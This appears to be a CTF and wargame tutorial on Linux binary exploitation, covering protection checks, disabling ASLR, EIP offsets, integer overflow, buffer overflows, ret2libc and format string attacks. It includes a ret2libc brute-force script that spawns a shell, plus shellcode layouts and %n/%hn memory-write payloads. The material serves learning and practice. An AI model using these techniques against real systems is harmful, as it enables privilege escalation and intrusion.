Binary Exploitation
This post (a work in progress) collects tips and tricks picked up while solving binary exploitation challenges in various CTFs and the OverTheWire wargames.
Thanks to superkojiman, barrebas and et0x, who helped me learn the concepts.
Basics
Let's start with some basic concepts and then look at some examples that help make them clear.
Big-endian systems store the most significant byte of a word in the smallest address and the least significant byte is stored in the largest address. Little-endian systems, in contrast, store the least significant byte in the smallest address. {% img left /images/big-endian.png 250 250 %} {% img right /images/little-endian.png 250 250 %}
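To make the byte order concrete, here is a minimal sketch that packs the same 32-bit value both ways with Python's struct module. The value 0x0A0B0C0D is just an illustrative choice, not something from a particular challenge.

```python
import struct

value = 0x0A0B0C0D  # illustrative 32-bit word

big = struct.pack(">I", value)     # most significant byte at the lowest address
little = struct.pack("<I", value)  # least significant byte at the lowest address

print(big.hex())     # 0a0b0c0d
print(little.hex())  # 0d0c0b0a
```

x86 and x86-64 are little-endian, which is why addresses in the exploits later in this post are written with the "<I" format.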
Initial Checks?
When you get a binary to exploit, first find out whether it is a 32-bit or 64-bit ELF, which platform it runs on, which buffer overflow prevention techniques are enabled, and what the EIP offset is.
Binary Architecture
Check whether the machine the binary runs on is x86 or x86-64.
uname -a
Check whether the binary is compiled for 32-bit or 64-bit.
file binary_file
Binary Help?
It is usually a good idea to run the binary with the -h or --help flag to check whether it prints any help documentation.
$ ./flagXX -h
Usage: php [options] [-f] <file> [--] [args...]
php [options] -r <code> [--] [args...]
Binary Protection
Several buffer overflow prevention techniques exist, such as RELRO, NoExecute (NX), stack canaries, Address Space Layout Randomization (ASLR) and Position Independent Executables (PIE). The list below shows where each protection is enforced:
Address space Layout Randomization : Kernel
Executable Stack Protection : Compiler
Stack smashing protection : Compiler
Position Independent Executables : Compiler
Fortify Source : Compiler
Stack Protector : Compiler
The Checksec script shows which buffer overflow prevention techniques a binary uses. The script is included in gdb-peda.
Whether the stack of a binary is executable can be checked with the readelf tool. If the GNU_STACK program header has the E flag set (for example RWE), the stack is executable.
narnia8@melinda:~$ readelf -l /narnia/narnia8 | grep GNU_STACK
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10
To make the stack executable, compile the program with the -z execstack option; to disable stack smashing protection, use -fno-stack-protector:
gcc -ggdb -m32 -fno-stack-protector -z execstack -o buffer1 buffer1.c
Address Space Layout Randomization (ASLR) is controlled by /proc/sys/kernel/randomize_va_space, which takes three values:
0 : Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
1 : Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
2 : Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.
You can change the setting temporarily by writing a new value to /proc/sys/kernel/randomize_va_space, for example:
echo value > /proc/sys/kernel/randomize_va_space
To change the value permanently, add the setting to /etc/sysctl.conf, for example:
kernel.randomize_va_space = value
and run the sysctl -p command.
If you change the value of randomize_va_space, you should test your application stack to ensure that it is compatible with the new setting. If necessary, you can disable ASLR for a specific program and its child processes by using the following command:
% setarch `uname -m` -R program [args ...]
PIE Enabled
If a binary is PIE enabled, we can't know its addresses until we run it. One approach is to disable ASLR on Linux, so that the addresses stay the same during analysis.
Use the start command in gdb to run the binary and stop at an early breakpoint, then use vmmap (if using pwndbg) to see the memory layout and the starting address of the binary:
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x555555554000 0x555555556000 r-xp 2000 0 /root/work/lucky/lucky
0x555555756000 0x555555757000 r-xp 1000 2000 /root/work/lucky/lucky
0x555555757000 0x555555758000 rwxp 1000 3000 /root/work/lucky/lucky
So the starting address is 0x555555554000; from here we can set breakpoints by adding the offset shown in IDA.
You can see the offsets in IDA if you go to Options > General and check Line prefixes.
Now you can set a breakpoint. E.g. if strcpy() is at offset 0x123, then you can do
br *0x555555554000+0x123
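The base-plus-offset arithmetic can be scripted when there are many breakpoints to set. This is a small sketch; the helper name breakpoint_address is made up for illustration, and the offset 0x123 is the same hypothetical value used above.

```python
def breakpoint_address(base, offset):
    """Return the runtime address for an offset read from the disassembler."""
    return base + offset

base = 0x555555554000   # first mapping reported by vmmap
offset = 0x123          # hypothetical offset of the strcpy() call

# Print a command that can be pasted into gdb.
print("br *%#x" % breakpoint_address(base, offset))
```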
EIP Offsets?
To find the EIP offset, you can use cyclic patterns. Use pattern_create.rb to create a non-repeating pattern to feed to the program, and pattern_offset.rb to find the exact offset of the value that ended up in EIP.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x37654136
[*] Exact match at offset 140
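If Metasploit is not at hand, the same idea can be sketched in a few lines of Python. This is not the Metasploit implementation; it only reproduces the upper/lower/digit pattern shown above, and the function names are my own. It assumes a 32-bit little-endian register value.

```python
import string
import struct

def pattern_create(length):
    """Build an upper/lower/digit pattern like Aa0Aa1Aa2..."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]

def pattern_offset(value, length=8192):
    """Find where a 32-bit little-endian register value occurs in the pattern."""
    needle = struct.pack("<I", value).decode("ascii")
    return pattern_create(length).find(needle)

print(pattern_create(20))
print(pattern_offset(0x37654136))
```

The value 0x37654136 is stored in memory as the bytes "6Ae7", which is why the lookup converts the register value back to little-endian text before searching.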
Others
Check all the ways user input is provided to the program.
Check all the printf statements and see if there is a printf that directly prints the user input (possible format string vulnerability).
Check how the flag or input is stored: on the stack (a variable, or read from a file?) or on the heap (dynamic allocation with malloc)?
Integer Overflow
A signed 32-bit integer has a range of -2,147,483,648 to 2,147,483,647.
Signed integers use the first bit to store whether the value is negative or positive, 0 indicating positive and 1 indicating negative.
What happens if you add 1 to 2,147,483,647 and store the result in a signed integer? The first bit goes from 0 to 1, meaning that the number is now negative! In fact, due to the way two's complement (the method used to represent negative numbers in binary) works, it wraps around to the most negative integer: -2,147,483,648.
Example
if(auction_choice == 1){
    printf("These knockoff Flags cost 900 each, enter desired quantity\n");
    int number_flags = 0;
    fflush(stdin);
    scanf("%d", &number_flags);
    if(number_flags > 0){
        int total_cost = 0;
        total_cost = 900*number_flags;   /* can overflow for large quantities */
        printf("\nThe final cost is: %d\n", total_cost);
        if(total_cost <= account_balance){
            account_balance = account_balance - total_cost;
            printf("\nYour current balance after transaction: %d\n\n", account_balance);
        }
        else{
            printf("Not enough funds to complete purchase\n");
        }
    }
}
else if(auction_choice == 2){
    printf("1337 flags cost 100000 dollars, and we only have 1 in stock\n");
    if(bid == 1){
        if(account_balance > 100000){
            /* the flag is read from a file and printed here */
            printf("Flag is XXX\n");
        }
        else{
            printf("\nNot enough funds for transaction\n\n\n");
        }
    }
}
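In the above example, account_balance must be greater than 100000 to get the flag (the initial balance is 1000). Here total_cost is an int, with a maximum value of 2,147,483,647. As total_cost = 900*number_flags, we can roughly calculate the number of flags needed to overflow total_cost by dividing 2,147,483,647 by 900. A total_cost that has wrapped to a negative number passes the total_cost <= account_balance check, and subtracting it increases the balance.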
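The arithmetic can be checked with a short simulation. This is a sketch that assumes 32-bit ints that wrap around on overflow, which is what typically happens on x86 even though signed overflow is formally undefined in C. The helper to_int32 and the quantity 4771075 are my own choices for illustration.

```python
def to_int32(value):
    """Wrap an arbitrary Python integer to a signed 32-bit value."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value

INT_MAX = 2147483647
first_overflow = INT_MAX // 900 + 1          # smallest quantity that overflows
print(first_overflow, to_int32(900 * first_overflow))

# A larger quantity gives a negative cost closer to zero, so the subtraction
# account_balance - total_cost does not itself wrap around.
number_flags = 4771075                        # hypothetical input
total_cost = to_int32(900 * number_flags)
account_balance = to_int32(1000 - total_cost)
print(total_cost, account_balance)
```

Note that the smallest overflowing quantity produces such a large negative cost that the new balance wraps around a second time, so it is worth picking a quantity whose wrapped cost is only moderately negative.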
Buffer overflow
Executable Stack
You can put the shellcode in the buffer and then redirect EIP to a NOP sled followed by the shellcode (provided the shellcode is correct and the stack is executable).
Non-executable stack, ASLR Disabled
However, if the stack is not executable or the shellcode is not working (it happens sometimes), then we can either,
Export an environment variable
Export an environment variable containing the shellcode. Note that environment variables also live on the stack, so this variant still needs an executable stack; it mainly helps when the buffer is too small for the shellcode or the input gets mangled.
Find the address of the environment variable on the stack. Use getenvaddr.c to get the address of the environment variable:
---getenvaddr.c---
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char *ptr;
    if (argc < 3) {
        printf("Usage: %s <environment var> <target program name>\n", argv[0]);
        exit(0);
    } else {
        ptr = getenv(argv[1]); /* Get environment variable location */
        if (ptr == NULL) {     /* Variable is not set */
            printf("%s is not set\n", argv[1]);
            exit(1);
        }
        ptr += (strlen(argv[0]) - strlen(argv[2])) * 2; /* Adjust for program name */
        printf("%s will be at %p\n", argv[1], ptr);
    }
    return 0;
}
Set the return address to the start of the shellcode.
Get a shell.
Return2libc
Use return2libc, which is a type of ROP.
Find the address of the system function (run gdb -q ./program, then break main, run, and p system):
gdb -q ./retlib
(no debugging symbols found)...(gdb)
(gdb) b main
Breakpoint 1 at 0x804859e
(gdb) r
Starting program: /home/c0ntex/retlib
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x0804859e in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x28085260 <system>
Find the address of "/bin/sh" in memory, or export it in an environment variable, and call it like system("/bin/sh"). The payload has the format
<ADDRofSYSTEM> <4ArbitraryBytes for Return Address> <argument for system[/bin/sh]>
The 4 arbitrary bytes for the return address could be a JUNK address, "\xCC\xCC\xCC\xCC" or the address of the exit function.
The payload has this shape because, when a function is called, its parameters are pushed onto the stack, followed by the return address (saved EIP) of the calling function and then the saved frame pointer (EBP), with the stack pointer (ESP) at the top of the frame.
Top of stack (lower memory address)
Buffer
....
Saved Frame Pointer (EBP)
Saved Return address (EIP)
Function() arguments
Function() arguments
Bottom of stack (higher memory address)
If the return address is set to \xCC\xCC\xCC\xCC, then after system executes, it tries to return to 0xcccccccc. \xcc is good just to check that you're actually jumping to your shellcode, but once you've verified that it works, you should remove it. ret expects an address, not a payload; \xCC bytes belong in the payload itself (where they act as a breakpoint), not in the return address slot.
If a JUNK address is used, the binary will already have run the command by the time it returns, but it will then segfault.
If the proper address of exit() is used, the binary will exit cleanly.
It's better to use /bin/sh instead of /bin/bash, since bash drops privileges. If /bin/bash is used, it will launch /bin/bash but you'll find that you haven't elevated your privileges, which can get confusing. So either find another string that points to /bin/sh or set your own environment variable like DASH=/bin/sh and reference that. Good papers to review are Bypassing non-executable-stack during Exploitation (return-to-libc) and Performing a ret2libc Attack.
Sometimes you need to add a cat to keep the shell alive:
(cat input; cat) | ./binary
where input is the file containing the payload you are sending.
Return-Oriented Programming
Msfelfscan can be used to locate interesting addresses within executable and linkable format (ELF) programs, which may prove useful in developing exploits.
/usr/share/framework2/msfelfscan -f stack7
Usage: /usr/share/framework2/msfelfscan <input> <mode> <options>
Inputs:
-f <file> Read in ELF file
Modes:
-j <reg> Search for jump equivalent instructions
-s Search for pop+pop+ret combinations
-x <regex> Search for regex match
-a <address> Show code at specified virtual address
Options:
-A <count> Number of bytes to show after match
-B <count> Number of bytes to show before match
-I address Specify an alternate base load address
-n Print disassembly of matched data
We can use msfelfscan to find a pop-pop-ret gadget, choose its address and use
pop-pop-ret-addr | 8 bytes junk | address to execute |
where address-to-execute is the address of the environment variable where shellcode is stored.
Non-Executable Stack, ASLR Enabled
If ASLR is enabled, the libc base address changes every time the binary is executed.
for i in `seq 1 5`; do ldd ovrflw | grep libc; done
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb762f000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb758f000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75ae000)
However, notice that the libc address does not change much: only a few hex digits in the middle vary, while the leading digits and the last three digits stay the same. Since the machine we are attacking is probably a 32-bit CTF machine, we can brute-force the possible libc addresses. To do so, figure out the offsets of system, exit and the string "/bin/sh" from the libc base address. Remember,
<ADDRofSYSTEM> <4ArbitraryBytes for Return Address> <argument for system[/bin/sh]>
Find the offset of system, exit and /bin/sh
System
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
246: 00113d70 68 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0
628: 0003ab40 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
1461: 0003ab40 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
Exit function
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
112: 0002ec00 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10
141: 0002e7f0 33 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
451: 0002ec30 181 FUNC GLOBAL DEFAULT 13 __cxa_thread_atexit_impl@@GLIBC_2.18
559: 000b1645 24 FUNC GLOBAL DEFAULT 13 _exit@@GLIBC_2.0
617: 00116de0 56 FUNC GLOBAL DEFAULT 13 svc_exit@@GLIBC_2.0
652: 00120b60 33 FUNC GLOBAL DEFAULT 13 quick_exit@GLIBC_2.10
654: 0002ebd0 33 FUNC GLOBAL DEFAULT 13 quick_exit@@GLIBC_2.24
878: 0002ea20 85 FUNC GLOBAL DEFAULT 13 __cxa_atexit@@GLIBC_2.1.3
1048: 00120b20 52 FUNC GLOBAL DEFAULT 13 atexit@GLIBC_2.0
1398: 001b3204 4 OBJECT GLOBAL DEFAULT 33 argp_err_exit_status@@GLIBC_2.1
1510: 000f4130 58 FUNC GLOBAL DEFAULT 13 pthread_exit@@GLIBC_2.0
2112: 001b3150 4 OBJECT GLOBAL DEFAULT 33 obstack_exit_failure@@GLIBC_2.0
2267: 0002e820 78 FUNC WEAK DEFAULT 13 on_exit@@GLIBC_2.0
2410: 000f54f0 2 FUNC GLOBAL DEFAULT 13 __cyg_profile_func_exit@@GLIBC_2.2
String /bin/sh
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
15cdc8 /bin/sh
Now we know the offsets of system, exit and /bin/sh
1461: 0003ab40 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
141: 0002e7f0 33 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
15cdc8 /bin/sh
Creation of exploit
Now that we have the offsets, let's take a sample libc address and create the exploit
from subprocess import call
import struct
#---Offsets of System, Exit and /bin/sh
libc_base_addr = 0xb75e6000
system_offset = 0x0003ab40
exit_offset = 0x0002e7f0
binsh_offset = 0x0015cdc8
#---Calculation of System, Exit, binsh addr
system_addr = struct.pack("<I",libc_base_addr + system_offset)
exit_addr = struct.pack("<I",libc_base_addr + exit_offset)
binsh_addr = struct.pack("<I",libc_base_addr + binsh_offset)
#---Creating the payload
buf = b"A" * 112
buf += system_addr
buf += exit_addr
buf += binsh_addr
Calling the targeted binary multiple times
#---Execution of the binary multiple times
for i in range(512):
    print("Try: %s" % i)
    ret = call(["/usr/local/bin/ovrflw", buf])
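How many tries are reasonable? Here is a rough estimate, assuming that only two hex digits of the libc base vary (8 bits of entropy, which is my reading of the three ldd samples above, not a measured value) and that each run picks a base independently and uniformly.

```python
def success_probability(entropy_bits, attempts):
    """Chance that at least one attempt hits the guessed base address."""
    miss = 1.0 - 1.0 / (2 ** entropy_bits)
    return 1.0 - miss ** attempts

# Assumption: 8 bits of randomness in the libc base address.
for attempts in (64, 256, 512, 1024):
    print(attempts, round(success_probability(8, attempts), 3))
```

Under these assumptions, 512 tries succeed a bit more often than 6 times out of 7, so it can be worth rerunning the loop if the first batch fails.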
Sometimes we need shellcode to write a string or to get an actual shell. A good reference is Introduction to Writing Shellcode. The system call numbers that need to be placed in the EAX register are listed in the Linux System Call Table.
Let's see a small example where we move an address into the eax register and jump to it. The address we move into eax would contain our shellcode.
;test.asm
[SECTION .text]
global _start
_start:
mov eax, 0xffffd8bc
jmp eax
Just good to know: the global directive is NASM specific. It exports symbols in your code so that the generated object code records where they point. Here you mark the _start symbol global so that its name is added to the object code. The linker (ld) can read that symbol and its value from the object code, so it knows what to mark as the entry point in the output executable. When you run the executable, it starts at the location marked as _start in the code.
If the global directive is missing for a symbol, that symbol will not be placed in the object code's export table, so the linker has no way of knowing about it. We can assemble the asm file with
nasm -f elf test.asm
and link it with
ld -o test test.o
If you get the error below
ld: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output
either assemble for 64 bits instead of 32 with the following command:
nasm -f elf64 loader.asm -o loader.o
or, if you want to keep the file 32-bit, link it with:
ld -m elf_i386 -s -o file file.o
To see the byte code
objdump -d <file>
When exploiting a buffer overflow with shellcode on the stack, we usually place the shellcode before the saved EIP. We should also check whether we can put the shellcode after EIP. This is particularly useful when some kind of check on the input is applied to the bytes before EIP. Example: suppose EIP is at offset 80. We would usually do
python -c 'print "\x90"*50 + "30 Bytes of ShellCode" + "4 Bytes return address to NOP or shellcode in left"'
However, if some kind of check for alphanumeric characters is applied to the first 80 bytes, you won't be able to put your shellcode in those 80 bytes. In that case, check whether you can overflow past EIP and redirect execution there. For example
python -c 'print "A"*80 + "4 Bytes return address to NOP or shellcode in right" + "\x90"*50 + "30 Bytes of ShellCode"'
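Both layouts can be built as bytes and sanity-checked before sending. In this sketch the shellcode is a 30-byte placeholder and the return address 0xffffd8bc is hypothetical; in a real exploit each layout would use its own return address pointing into its own NOP sled.

```python
import struct

OFFSET = 80                                   # saved EIP offset from the text
shellcode = b"\xcc" * 30                      # placeholder, not real shellcode
ret = struct.pack("<I", 0xffffd8bc)           # hypothetical stack address

# Shellcode before the saved EIP: NOP sled + shellcode fill the 80 bytes.
before = b"\x90" * (OFFSET - len(shellcode)) + shellcode + ret

# Shellcode after the saved EIP: padding, return address, then sled + shellcode.
after = b"A" * OFFSET + ret + b"\x90" * 50 + shellcode

print(len(before), len(after))
```

Checking that the return address sits exactly at the EIP offset catches most off-by-a-few mistakes before the payload ever reaches the target.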
Format String Vulnerability
Definition
If an attacker is able to provide the format string to an ANSI C format function in part or as a whole, a format string vulnerability is present. By doing so, the behaviour of the format function is changed, and the attacker may get control over the target application. A format string is an ASCIIZ string that contains text and format parameters. Example:
printf ("The magic number is: %d\n", 1911);
Behaviour of the format function
The behaviour of the format function is controlled by the format string. The function retrieves the parameters requested by the format string from the stack.
printf ("Number %d has no address, number %d has: %08x\n", i, a, &a);
From within the printf function the stack looks like:
stack top
. . .
<&a>
<a>
<i>
A
. . .
stack bottom
Crashing the Program
By utilizing format strings we can easily trigger some invalid pointer access by just supplying a format string like:
printf ("%s%s%s%s%s%s%s%s%s%s%s%s");
Because ‘%s’ displays memory from an address that is supplied on the stack, where a lot of other data is stored, too, our chances are high to read from an illegal address, which is not mapped.
Viewing the stack
We can show some parts of the stack memory by using a format string like this:
printf ("%08x.%08x.%08x.%08x.%08x\n");
This works, because we instruct the printf-function to retrieve five parameters from the stack and display them as 8-digit padded hexadecimal numbers. So a possible output may look like:
40012980.080628c4.bffff7a4.00000005.08059c04
This is a partial dump of the stack memory, starting from the current bottom upward to the top of the stack — assuming the stack grows towards the low addresses.
Viewing Memory at any location
We can look at memory locations different from the stack memory by providing an address to the format string.
Our format string is usually located on the stack itself, so we already have near to full control over the space, where the format string lies. The format function internally maintains a pointer to the stack location of the current format parameter. If we would be able to get this pointer pointing into a memory space we can control, we can supply an address to the ‘%s’ parameter. To modify the stack pointer we can simply use dummy parameters that will ‘dig’ up the stack by printing junk:
printf ("AAA0AAA1_%08x.%08x.%08x.%08x.%08x");
The ‘%08x’ parameters increase the internal stack pointer of the format function towards the top of the stack. After more or less of this increasing parameters the stack pointer points into our memory: the format string itself. The format function always maintains the lowest stack frame, so if our buffer lies on the stack at all, it lies above the current stack pointer for sure. If we choose the number of ‘%08x’ parameters correctly, we could just display memory from an arbitrary address, by appending ‘%s’ to our string. In our case the address is illegal and would be ‘AAA0’. Lets replace it with a real one. Example:
address = 0x08480110
address (encoded as 32 bit le string): "\x10\x01\x48\x08"
printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");
Will dump memory from 0x08480110 until a NUL byte is reached. If we cannot reach the exact format string boundary by using 4-byte pops (‘%08x’), we have to pad the format string by prepending one, two or three junk characters. This is analogous to the alignment in buffer overflow exploits.
Overwriting of Arbitrary Memory
There is the ‘%n’ parameter, which writes the number of bytes already printed, into a variable of our choice. The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack. But if we supply a correct mapped and writeable address this works and we overwrite four bytes (sizeof (int)) at the address:
"\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"
The format string above will overwrite four bytes at 0xbfffc8c0 with a small integer number. We have reached one of our goals: we can write to arbitrary addresses. By using a dummy parameter ‘%nu’ we are able to control the counter written by ‘%n’, at least a bit.
Direct Parameter Access
The direct parameter access is controlled by the ‘$’ qualifier:
printf ("%6$d\n", 6, 5, 4, 3, 2, 1);
Prints ‘1’, because the ‘6$’ explicitly addresses the 6th parameter on the stack.
The above text is taken from Exploiting Format String Vulnerabilities, which is a good paper to read on format strings.
Write two bytes
We can write two bytes with %hn and one byte with %hhn.
Write four bytes
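How to write four bytes? Suppose we need to write 0x08048706 to the address 0xffffd64c.
HOB: 0x0804 LOB: 0x8706
If HOB < LOB
[addr+2][addr] = \x4e\xd6\xff\xff\x4c\xd6\xff\xff
%.[HOB - 8]x = 0x804 - 8 = 0x7FC (2044) = %.2044x
%[offset]$hn = %6$hn
%.[LOB - HOB]x = 0x8706 - 0x804 = 0x7F02 (32514) = %.32514x
%[offset+1]$hn = %7$hn
The 8 is subtracted because the two addresses at the start of the string already account for 8 printed bytes. No other characters may appear between the directives, since every extra character changes the count written by %hn.
python -c 'print "\x4e\xd6\xff\xff\x4c\xd6\xff\xff" + "%.2044x%6$hn%.32514x%7$hn"'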
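The two-write recipe can be wrapped in a small helper so the padding values are not computed by hand. This is a sketch that only covers the HOB < LOB case described above; the function name two_short_writes is my own, and it assumes the two addresses land at argument positions offset and offset + 1 on a 32-bit little-endian target.

```python
import struct

def two_short_writes(addr, value, offset):
    """Build a %hn payload that writes a 32-bit value as two 16-bit halves.

    Assumes the high half is smaller than the low half (HOB < LOB) and that
    the two addresses sit at argument positions offset and offset + 1.
    """
    hob, lob = value >> 16, value & 0xFFFF
    if not 8 < hob < lob:
        raise ValueError("this sketch only handles 8 < HOB < LOB")
    # addr + 2 receives the high half first, addr receives the low half.
    payload = struct.pack("<I", addr + 2) + struct.pack("<I", addr)
    payload += b"%%.%dx%%%d$hn" % (hob - 8, offset)
    payload += b"%%.%dx%%%d$hn" % (lob - hob, offset + 1)
    return payload

print(two_short_writes(0xffffd64c, 0x08048706, 6))
```

When HOB is larger than LOB, the order of the two writes has to be swapped, which this sketch deliberately rejects rather than guesses at.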
Heap Exploitation
Appendix
GDB Basics
Getting inputs
Taken from Managing inputs for payload injection?
Getting inputs from char *argv[]
We can read the arguments from the initial command line
$> ./program $(python -c 'print("\xef\xbe\xad\xde")')
In gdb, we can pass the arguments through the run command line:
(gdb) run $(python -c 'print("\xef\xbe\xad\xde")')
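A caveat when python points to Python 3: print() encodes the string as text (usually UTF-8), so "\xef\xbe\xad\xde" no longer comes out as four raw bytes. The sketch below shows the difference and one way to emit raw bytes; the helper name emit is my own.

```python
import sys

text = "\xef\xbe\xad\xde"          # four code points, not four bytes
raw = b"\xef\xbe\xad\xde"          # four bytes

# UTF-8 turns each code point above 0x7f into two bytes.
print(len(text.encode("utf-8")), len(raw))

def emit(payload):
    """Write raw bytes to stdout without any text encoding."""
    sys.stdout.buffer.write(payload)
    sys.stdout.buffer.flush()
```

On the command line the equivalent would be something like python3 -c 'import sys; sys.stdout.buffer.write(b"\xef\xbe\xad\xde")'.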
Getting inputs from a file
We can also provide input from file
$> ./program ./myfile.txt
And, within gdb
(gdb) run myfile.txt
Then, outside of gdb you can rewrite the content of the file and run your program again and again in gdb.
Getting inputs from stdin
Getting input through stdin can be achieved with a wide variety of functions such as fgets(), scanf(), getline(), read() and others. It raises a few problems, because the program stops while executing and waits to be fed characters.
In case you have to deal with several inputs (e.g. login, password, …), you need to use separators between the inputs. Usually the separator between each input is just a newline character (\n or \r depending on the system you are on).
Now, there are two ways to feed stdin. Either we pass a file
$> cat ./mycommands.txt | ./program
In gdb, stdin is fed by redirecting from the file on the run command line
(gdb) run < ./mycommands.txt
And do as said in the previous case.
The other option is to pipe the output of a command to the stdin of the program
$> python -c 'print("\xef\xbe\xad\xde")' | ./program
In gdb we can use the bash process substitution <(cmd) trick:
(gdb) run < <(python -c 'print("\xef\xbe\xad\xde")')
This way is much quicker than effectively creating a named pipe and branch your program on it. Creating the named pipe outside of gdb requires a lot of unnecessary steps where you have it instantly with the previous technique.
Note also that some people use <<< $(cmd) like this:
(gdb) run <<< $(python -c 'print("\xef\xbe\xad\xde")')
But this last technique filters out all NULL bytes (bash command substitution drops them), so you should prefer the first one (especially if you want to pass NULL bytes).
Getting inputs from network
We can use netcat nc. Basically, if your vulnerable program is listening on localhost:666 then the command line would be:
$> python -c 'print("\xef\xbe\xad\xde")' | nc -vv localhost 666
Within gdb, the point will be to run (r) the program and to connect to it from another terminal.
Keep the stdin open after injection
Most of the techniques for stdin send the exploit string to the program, and the program then ends shortly after the input terminates because stdin is closed. This mainly matters for gets-style buffer overflows, where stdin has to stay open for the spawned shell. The best way to keep it open afterward and get an active shell is to add a cat waiting for input on its stdin. It should look like this if you go through a file:
$> (cat ./mycommands.txt; cat) | ./program
Or, if you want a shell command:
$> (python -c 'print("\xef\xbe\xad\xde")'; cat) | ./program
Or, finally, if you are going through the network:
$> (python -c 'print("\xef\xbe\xad\xde")'; cat) | nc -vv localhost 666
Examining Data
Examining functions
info functions command : Displays the list of functions in the debugged program
gdb-peda$ info functions
All defined functions:
Non-debugging symbols:
0x00000000000005a0 _init
0x00000000000005d0 setresgid@plt
0x00000000000005e0 system@plt
0x00000000000005f0 printf@plt
0x0000000000000600 getegid@plt
0x0000000000000620 _start
0x0000000000000650 deregister_tm_clones
0x0000000000000690 register_tm_clones
0x00000000000006e0 __do_global_dtors_aux
0x0000000000000720 frame_dummy
0x000000000000072a vuln
0x0000000000000765 main
0x00000000000007c0 __libc_csu_init
0x0000000000000830 __libc_csu_fini
0x0000000000000834 _fini
Run it before running the program, otherwise all linked functions would also be shown.
Disassembling Functions
GDB
disassemble main
GDB-Peda
pdisass main
Examining Memory
We can use the command x (for “examine”) to examine memory in any of several formats, independently of your program’s data types.
x/nfu addr
x addr
x
Use the x command to examine memory.
n, f, and u are all optional parameters that specify how much memory to display and how to format it; addr is an expression giving the address where you want to start displaying memory.
n, the repeat count : The repeat count is a decimal integer; the default is 1. It specifies how much memory (counting by units u) to display.
f, the display format : The display format is one of the formats used by print, ‘s’ (null-terminated string), or ‘i’ (machine instruction). The default is ‘x’ (hexadecimal) initially. The default changes each time you use either x or print.
u, the unit size : The unit size is any of
b Bytes.
h Halfwords (two bytes).
w Words (four bytes). This is the initial default.
g Giant words (eight bytes).
Examining Data
Sometimes you need to know the address of a variable in order to write an arbitrary value into it.
Run gdb <program>, then p &<variablename>
We can also use
(gdb) info address variable_name
Symbol "variable_name" is static storage at 0x903278.
Find the address of a string using GDB?
(gdb) info proc map
process 930
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x401000 0x1000 0x0 /myapp
0x600000 0x601000 0x1000 0x0 /myapp
0x601000 0x602000 0x1000 0x1000 /myapp
0x7ffff7a1c000 0x7ffff7bd2000 0x1b6000 0x0 /usr/lib64/libc-2.17.so
0x7ffff7bd2000 0x7ffff7dd2000 0x200000 0x1b6000 /usr/lib64/libc-2.17.so
0x7ffff7dd2000 0x7ffff7dd6000 0x4000 0x1b6000 /usr/lib64/libc-2.17.so
0x7ffff7dd6000 0x7ffff7dd8000 0x2000 0x1ba000 /usr/lib64/libc-2.17.so
(gdb) find 0x7ffff7a1c000,0x7ffff7bd2000,"/bin/sh"
0x7ffff7b98489
1 pattern found.
(gdb) x /s 0x7ffff7b98489
0x7ffff7b98489: "/bin/sh"
(gdb) x /xg 0x7ffff7b98489
0x7ffff7b98489: 0x0068732f6e69622f
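The giant word printed by x /xg looks reversed because x86-64 is little-endian. A quick way to read such a value back as the bytes that actually sit in memory:

```python
import struct

word = 0x0068732f6e69622f            # value printed by x /xg
print(struct.pack("<Q", word))       # b'/bin/sh\x00'
```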
Examining Frames
Here we interpret the output of GDB's info frame command.
(gdb) info frame
Stack level 0, frame at 0xb75f7390:
eip = 0x804877f in base::func() (testing.cpp:16); saved eip 0x804869a
called by frame at 0xb75f73b0
source language c++.
Arglist at 0xb75f7388, args: this=0x0
Locals at 0xb75f7388, Previous frame's sp is 0xb75f7390
Saved registers:
ebp at 0xb75f7388, eip at 0xb75f738c
Stack level 0 : the frame number in the backtrace. 0 is the currently executing frame; the numbering grows towards the callers, consistent with the stack layout.
frame at 0xb75f7390 : starting memory address of this stack frame
